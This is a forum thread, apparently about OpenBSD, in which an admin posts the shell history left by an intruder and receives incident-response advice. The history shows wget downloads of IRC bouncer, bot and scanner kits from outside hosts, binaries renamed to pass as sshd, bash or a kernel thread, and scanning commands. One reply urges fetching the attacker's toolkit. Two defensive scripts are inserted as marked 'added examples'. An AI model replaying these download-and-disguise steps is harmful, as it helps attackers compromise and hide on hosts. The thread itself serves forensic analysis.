weak password=broken
I just found out that a user had a weak password and it was broken. How do I trace what a user has been doing?
I only see brief info in .bash_history (below). Any help at all is welcome; I've changed the password and deleted the 2 directories I've found. Not a single hit on robotbsd in Google makes me a bit worried. Code:
ls
ps 'ux
uname
uname -a
uptime
wget
w
passwd
ls
uname -a
fetch www.psybnc.net/psyBNC-2.3.2-7.tar.gz
wget
wget www.psybnc.net/psyBNC-2.3.2-7.tar.gz
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
ls
pico menuconf
pico config.h
ls
pico psybncchk
ls
pico CHANGES
make
ls
pico psybnc.conf
ls
rm -rf salt.h
mv psybnc sshd
export PATH="."
sshd
ps -ux
ls
exit
ps-ux
ps -ux
ls
kill -9 29089
ps -ux
kill -9 28097
ps -ux
ls
cd psybnc
ls
pico psybnc.conf
ls
sshd
export PATH="."
sshd
ps -ux
ls
exit
ls -ps -ux
ls
ps -ux
ls
kill -9 12813
ls
ps -ux
ls
cd psybnc
ls
mv sshd bash
./bash
ps -ux
kill -9 12169
ls
cd ..
ls
wget badry.uv.ro/robotlinux.tgz
ls
tar xvf robotlinux.tgz
cd ". .".l
ls
pico mech.set
./[kupdateb]
[kupdateb]
export PATH="."
[kupdateb]
ls
exit
ls
ls -a
cd /var/tmp
mkdir roxy
cd roxy/
ls
ls -a
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
ls
pico m.session
ls
./[kupdateb]
chmod +x *
ls
[kupdateb]
./ [kupdateb]
ls
cd ..
ls
ls
exit
ls
ps -ux
cd psybnc
ls
cd ..
ls
rm -rf psybnc
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
make
ls
mv psybnc bash
./bash
ps -ux
ls
w
uname -a
uptime
exit
ls
ps -ux
ls -a
exit
ps -ux
uname -a
uptime
ls -a
ls -a
exit
ps -ux
uname -a
ls -a
cd ". .".l
ls
./[kupdateb]
ls
cd /var/tmp
ls
ls
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
./[kupdateb]
ls
ps -ux
uname -a
uptime
ls
cd ..
ls
ls
wget bucus.tvn.hu/wtf.tgz
ls
ftp
tar xvf wtf.tgz
ls
cd wtf
ls
./a 21.21
rm -rf a1
rm -rf scam
./a 53.21
exit
On the simple side, using ... tcpdump and/or pftop (if installed) you can "watch" your box's actual network traffic to see who's NOW talking to you and whom you're talking to. If you cannot account for the sessions you see, then you are OPERATING as a compromised host. The very nature of an IM/IRC "bot" would suggest that you're going to see lots and lots of sessions. In the bash history, where you see Code:
./a 21.21 /S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
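As an added example (not part of the reply above, and not code from the thread), here is a small POSIX sh helper that applies the "account for every session" idea to a socket listing rather than a packet capture: feed it `netstat -an` output plus an allowlist of peers you recognise, and it prints whatever is left over. The netstat layout (BSD style, address and port joined by a dot), the allowlist, and the sample listing are all assumptions constructed for the example.

```sh
#!/bin/sh
# Added example, not code from the thread. Applies the "account for every session"
# idea to a socket table instead of a packet capture: feed it `netstat -an` output
# and an allowlist of peers you recognise, and it prints what is left over.
# Assumes the OpenBSD/BSD netstat layout, where address and port are joined by a
# dot (e.g. 203.0.113.9.6667). The sample below is constructed, not a real capture.

SAMPLE='Active Internet connections (including servers)
Proto   Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp          0      0  192.0.2.10.22          198.51.100.7.51234     ESTABLISHED
tcp          0      0  192.0.2.10.34567       203.0.113.9.6667       ESTABLISHED
tcp          0      0  192.0.2.10.34568       203.0.113.9.6667       ESTABLISHED
tcp          0      0  192.0.2.10.40001       203.0.113.44.53        ESTABLISHED
tcp          0      0  *.22                   *.*                    LISTEN
udp          0      0  *.514                  *.*'

# Peers you can account for (say, your admin workstation and your resolver),
# space separated. Anything else is unexplained until proven otherwise.
ALLOW='198.51.100.7 203.0.113.44'

# unaccounted_sessions: read netstat output on stdin, print "host port" for every
# ESTABLISHED tcp session whose foreign host is not in $ALLOW.
unaccounted_sessions() {
    awk -v allow="$ALLOW" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "tcp" && $NF == "ESTABLISHED" {
        peer = $5                              # foreign address, host.port
        i = match(peer, /\.[0-9]+$/)           # last dot separates the port
        host = substr(peer, 1, i - 1)
        port = substr(peer, i + 1)
        if (!(host in ok)) print host, port
    }'
}

# count_unaccounted: how many unexplained sessions the sample contains.
count_unaccounted() {
    printf '%s\n' "$SAMPLE" | unaccounted_sessions | wc -l | tr -d ' '
}

# irc_peers: unexplained peers on the classic IRC port range 6660-6669, the kind
# of traffic a psyBNC-style bouncer or bot generates.
irc_peers() {
    printf '%s\n' "$SAMPLE" | unaccounted_sessions |
        awk '$2 >= 6660 && $2 <= 6669 { print $1 }' | sort -u
}

# Live use on the box itself:
#   netstat -an | unaccounted_sessions
# then fstat(1) or ps(1) to map a suspicious socket back to its process.
echo "unaccounted sessions: $(count_unaccounted)"
echo "irc peers: $(irc_peers)"
```

On the constructed sample the two sessions to 203.0.113.9 on port 6667 come out as unaccounted. The point of the allowlist is that you have to write down what you expect before you look; a bot's sessions will not look odd by themselves, they only look odd against a list of what should be there.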
The Hungarian link is still functional, so go get wtf.tgz. It's a real script kiddie's toolkit. There are even word dictionaries. It also has a shell script that was copied to the compromised account's directory. It may help you trace any changes made.
For the next time (I truly hope there won't be any), please enforce strict password policies, like setting a minimum length, with both lower- and uppercase alphanumeric sets. And check the handbook, part III (System Administration), especially chapters 13 to 17. There are many good security tips.
__________________
May the source be with you! Last edited by Beastie; 1st July 2009 at 06:11 PM.
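As an added example (not from the reply above and not code from the thread), this is a small external password checker of the kind the OpenBSD login.conf(5) "passwordcheck" capability can run when a user sets a password, implementing the policy suggested above: a minimum length plus lower-case, upper-case and digit classes. It assumes the checker receives the candidate password on standard input and exits 0 to accept it; the install path, the length of 12 and the login.conf lines in the comment are assumptions.

```sh
#!/bin/sh
# Added example, not code from the thread: a small external password checker of
# the kind login.conf(5)'s "passwordcheck" capability can run when a user changes
# a password. Assumption: the checker is given the candidate password on standard
# input and exits 0 to accept it, non-zero to reject it. It enforces the policy
# suggested above: a minimum length plus lower-case, upper-case and digit classes.
#
# Corresponding /etc/login.conf lines (install path is an assumption):
#   default:\
#       :minpasswordlen=12:\
#       :passwordcheck=/usr/local/sbin/pwcheck check:\

MINLEN=12   # assumed value; tune for your site

# check_password PASSWORD: return 0 if acceptable, 1 otherwise (reason on stderr)
check_password() {
    pw=$1
    if [ "${#pw}" -lt "$MINLEN" ]; then
        echo "password shorter than $MINLEN characters" >&2
        return 1
    fi
    case $pw in *[a-z]*) ;; *) echo "no lower-case letter" >&2; return 1 ;; esac
    case $pw in *[A-Z]*) ;; *) echo "no upper-case letter" >&2; return 1 ;; esac
    case $pw in *[0-9]*) ;; *) echo "no digit" >&2; return 1 ;; esac
    return 0
}

# Entry point used by login.conf: "pwcheck check" reads one line from stdin.
# Guarded by the argument so that sourcing this file does not consume stdin.
if [ "${1-}" = check ]; then
    IFS= read -r candidate
    check_password "$candidate"
    exit $?
fi
```

Try it from a shell with `printf '%s\n' 'Correct.Horse9Battery' | sh pwcheck check; echo $?` (0) and a short or all-lower-case string (1). If you keep a compiled /etc/login.conf.db, rebuild it with cap_mkdb after editing login.conf. Of the three rules, the minimum length is the one that actually defeats guessing; the character-class checks mainly stop dictionary words from slipping through at that length.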
What handbook Beastie? aren't you a little lost?
Ah, sorry for that. I KNEW I was in the OpenBSD section and yet I was still thinking about the FreeBSD handbook.
However, most topics there are common to both systems (and many others), some are general tips that can apply to any situation and some provide general information about the use and configuration of third-party software or software common to both systems.
__________________
May the source be with you!